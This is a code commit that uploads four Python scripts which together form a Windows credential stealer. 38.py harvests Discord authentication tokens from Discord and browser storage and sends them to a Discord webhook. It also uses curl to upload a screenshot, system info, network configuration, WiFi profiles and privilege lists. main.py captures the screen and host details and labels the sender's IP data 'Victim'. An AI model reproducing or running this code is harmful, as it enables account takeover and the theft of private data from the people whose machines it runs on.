Add files via upload

Author: brows3r

38.py

@@ -0,0 +1,90 @@
+import os
+import re
+import json
+
+from urllib.request import Request, urlopen
+
+WEBHOOK_URL = 'WEBHOOK HERE' # PUT WEBHOOK HERE
+
+PING_ME = False
+
+def find_tokens(path):
+    path += '\\Local Storage\\leveldb'
+
+    tokens = []
+
+    for file_name in os.listdir(path):
+        if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
+            continue
+
+        for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
+            for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
+                for token in re.findall(regex, line):
+                    tokens.append(token)
+    return tokens
+
+def main():
+    local = os.getenv('LOCALAPPDATA')
+    roaming = os.getenv('APPDATA')
+
+    paths = {
+        'Discord': roaming + '\\Discord',
+        'Discord Canary': roaming + '\\discordcanary',
+        'Discord PTB': roaming + '\\discordptb',
+        'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default',
+        'Opera': roaming + '\\Opera Software\\Opera Stable',
+        'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
+        'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default'
+    }
+
+    message = '@everyone' if PING_ME else ''
+
+    for platform, path in paths.items():
+        if not os.path.exists(path):
+            continue
+
+        message += f'\n**{platform}**\n```\n'
+
+        tokens = find_tokens(path)
+
+        if len(tokens) > 0:
+            for token in tokens:
+                message += f'{token}\n'
+        else:
+            message += 'No tokens found.\n'
+
+        message += '```'
+
+    headers = {
+        'Content-Type': 'application/json',
+        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'
+    }
+
+    payload = json.dumps({'content': message})
+
+    try:
+        req = Request(WEBHOOK_URL, data=payload.encode(), headers=headers)
+        urlopen(req)
+    except:
+        pass
+
+if __name__ == '__main__':
+    main()
+    
+os.system("py addr.py > Files\RegistryInfo.txt")
+
+os.system('''curl -i -H 'Expect: application/json' -F file=@Files\image.jpg -F 'payload_json={ "wait": true, "content": "", "username": "" }' https://discord.com/api/webhooks/WEBHOOK''') # PUT WEBHOOK HERE
+
+os.system('''curl -i -H 'Expect: application/json' -F file=@Files\ExtraSystemInfo.txt -F 'payload_json={ "wait": true, "content": "", "username": "" }' https://discord.com/api/webhooks/WEBHOOK''') # PUT WEBHOOK HERE
+
+os.system('''curl -i -H 'Expect: application/json' -F file=@Files\ipconfig.txt -F 'payload_json={ "wait": true, "content": "", "username": "" }' https://discord.com/api/webhooks/WEBHOOK''') # PUT WEBHOOK HERE
+
+os.system('''curl -i -H 'Expect: application/json' -F file=@Files\systemperms.txt -F 'payload_json={ "wait": true, "content": "", "username": "" }' https://discord.com/api/webhooks/WEBHOOK''') # PUT WEBHOOK HERE
+
+os.system('''curl -i -H 'Expect: application/json' -F file=@Files\WiFi-List.txt -F 'payload_json={ "wait": true, "content": "", "username": "" }' https://discord.com/api/webhooks/WEBHOOK''') # PUT WEBHOOK HERE
+
+os.system('''curl -i -H 'Expect: application/json' -F file=@Files\ActiveConnections.txt -F 'payload_json={ "wait": true, "content": "", "username": "" }' https://discord.com/api/webhooks/WEBHOOK''') # PUT WEBHOOK HERE
+
+os.system('''curl -i -H 'Expect: application/json' -F file=@Files\driverquery.txt -F 'payload_json={ "wait": true, "content": "", "username": "" }' https://discord.com/api/webhooks/WEBHOOK''') # PUT WEBHOOK HERE''')
+
+exit()

addr.py

@@ -0,0 +1,177 @@
+import winreg
+import os
+
+print("Scanning Registry...")
+print("Scanning Registry...")
+print("Done.")
+
+# CurrentVersion
+
+print(''' 
+Information from SOFTWARE\Microsoft\Windows NT\CurrentVersion
+---------------------------------------------------------------''')
+
+def reg():
+	access_reg = winreg.ConnectRegistry(None,winreg.HKEY_LOCAL_MACHINE)
+
+	regkey = winreg.OpenKey(access_reg, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion")
+
+	for n in range(20):
+		try:
+			x = winreg.EnumValue(regkey, n)
+			print(x)
+		except:
+			break
+reg()
+
+print(''' 
+
+''')
+
+
+# Environment
+
+print(''' 
+Information from \Environment
+---------------------------------------------------------------''')
+
+def reg1():
+	access_reg = winreg.ConnectRegistry(None,winreg.HKEY_CURRENT_USER)
+
+	regkey = winreg.OpenKey(access_reg, r"Environment")
+
+	for n in range(20):
+		try:
+			x = winreg.EnumValue(regkey, n)
+			print(x)
+		except:
+			break
+reg1()
+
+
+print(''' 
+
+''')
+
+
+# HKEY_CURRENT_USER\Volatile
+
+print(''' 
+Information from HKEY_CURRENT_USER\Volatile Environment
+---------------------------------------------------------------''')
+
+def reg2():
+	access_reg = winreg.ConnectRegistry(None,winreg.HKEY_CURRENT_USER)
+
+	regkey = winreg.OpenKey(access_reg, r"Volatile Environment")
+
+	for n in range(20):
+		try:
+			x = winreg.EnumValue(regkey, n)
+			print(x)
+		except:
+			break
+reg2()
+
+
+print(''' 
+
+''')
+
+
+# SOFTWARE\Microsoft\Windows NT\CurrentVersion\networkcards\3
+
+print(''' 
+Information from SOFTWARE\Microsoft\Windows NT\CurrentVersion\networkcards\3
+------------------------------------------------------------------------------''')
+
+def reg3():
+	access_reg = winreg.ConnectRegistry(None,winreg.HKEY_LOCAL_MACHINE)
+
+	regkey = winreg.OpenKey(access_reg, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\networkcards\3")
+
+	for n in range(20):
+		try:
+			x = winreg.EnumValue(regkey, n)
+			print(x)
+		except:
+			break
+reg3()
+
+
+print(''' 
+
+''')
+
+
+# HARDWARE\DESCRIPTION\SYSTEM
+
+print(''' 
+Information from HARDWARE\DESCRIPTION\SYSTEM
+---------------------------------------------------------------''')
+
+def reg4():
+	access_reg = winreg.ConnectRegistry(None,winreg.HKEY_LOCAL_MACHINE)
+
+	regkey = winreg.OpenKey(access_reg, r"HARDWARE\DESCRIPTION\SYSTEM")
+
+	for n in range(20):
+		try:
+			x = winreg.EnumValue(regkey, n)
+			print(x)
+		except:
+			break
+reg4()
+
+
+print(''' 
+
+''')
+
+
+# SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform
+
+
+print(''' 
+Information from SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform
+---------------------------------------------------------------''')
+
+def reg5():
+	access_reg = winreg.ConnectRegistry(None,winreg.HKEY_LOCAL_MACHINE)
+
+	regkey = winreg.OpenKey(access_reg, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform")
+
+	for n in range(20):
+		try:
+			x = winreg.EnumValue(regkey, n)
+			print(x)
+		except:
+			break
+reg5()
+
+print(''' 
+
+''')
+
+# \SOFTWARE\Microsoft\Windows Defender
+
+print(''' 
+Information from \SOFTWARE\Microsoft\Windows Defender
+---------------------------------------------------------------''')
+
+def reg6():
+	access_reg = winreg.ConnectRegistry(None,winreg.HKEY_LOCAL_MACHINE)
+
+	regkey = winreg.OpenKey(access_reg, r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform")
+
+	for n in range(20):
+		try:
+			x = winreg.EnumValue(regkey, n)
+			print(x)
+		except:
+			break
+reg6()
+
+
+
+os.system("py registry.py > Files\RegistryInfo.txt")

main.py

@@ -0,0 +1,95 @@
+import os
+import shutil
+import requests
+import socket
+import winreg
+import pyautogui
+import platform
+import psutil
+from datetime import datetime
+from getmac import get_mac_address
+
+
+infofile1 = "ipconfig.txt"
+infofile2 = "sysinfo.txt"
+
+dirsys1 = "Files\ipconfig.txt"
+dirsys2 = "Files\sysinfo.txt"
+
+os.system("ipconfig > ipconfig.txt")
+shutil.move(infofile1, dirsys1)
+
+
+def priv():
+    f = open("priv.cmd", "w")
+    f.write('''echo off
+
+    whoami /priv > Files\systemperms.txt
+    exit
+    ''')
+
+    os.system("start priv.cmd")
+
+priv()
+
+ss = pyautogui.screenshot()
+
+ss.save("Files\image.jpg")
+
+machine1 = platform.machine()
+version1 = platform.version()
+platform1 = platform.platform()
+uname1 = platform.uname()
+system1 = platform.system()
+process1 = platform.processor()
+computername = socket.gethostname()
+localipaddress = socket.gethostbyname(computername)
+boottime = datetime.fromtimestamp(psutil.boot_time())
+
+url = "WEBHOOK HERE" # PUT WEBHOOK HERE
+
+def ipaddrr():
+
+	payloads = {
+		"content": f"```System Info:\n---------------- \nMachine: {machine1}\nVersion: {version1}\nPlatform: {platform1}\nUname: {uname1}\nSystem: {system1}\nProccessor: {process1}\nPC Name: {computername}\nLocal IP: {localipaddress}\nLast Boot Time: {boottime}```",
+		"username": "",
+		"avatar_url": "",
+	}
+	requests.post(url, data=payloads)
+
+ipaddrr()
+
+def ipaddr():
+	
+	ipaddr = requests.get("https://vpnapi.io/api/").text
+
+	payloads = {
+		"content": f"``` Victim: \n{ipaddr}```",
+		"username": "",
+		"avatar_url": "",
+	}
+	requests.post(url, data=payloads)
+
+ipaddr()
+
+file1 = "WiFi-List.txt"
+fields1 = "Files\WiFi-List.txt"
+
+os.system("netstat -n > Files\ActiveConnections.txt")
+
+os.system("Netsh WLAN show profiles > WiFi-List.txt")
+
+os.remove("priv.cmd")
+
+os.system("DRIVERQUERY > Files\driverquery.txt")
+
+shutil.move(file1, fields1)
+
+sys_file = "ExtraSystemInfo.txt"
+sys_dir = "Files\ExtraSystemInfo.txt"
+
+os.system("systeminfo > ExtraSystemInfo.txt")
+
+shutil.move(sys_file, sys_dir)
+
+exec(open("38.py").read())

start.py

@@ -0,0 +1,14 @@
+import os
+
+os.system("pip3 install re")
+os.system("pip3 install shutil")
+os.system("pip3 install requests")
+os.system("pip3 install socket")
+os.system("pip3 install winreg")
+os.system("pip3 install pyautogui")
+os.system("pip3 install platform")
+os.system("pip3 install psutil")
+os.system("pip3 install getmac")
+
+
+exec(open("main.py").read())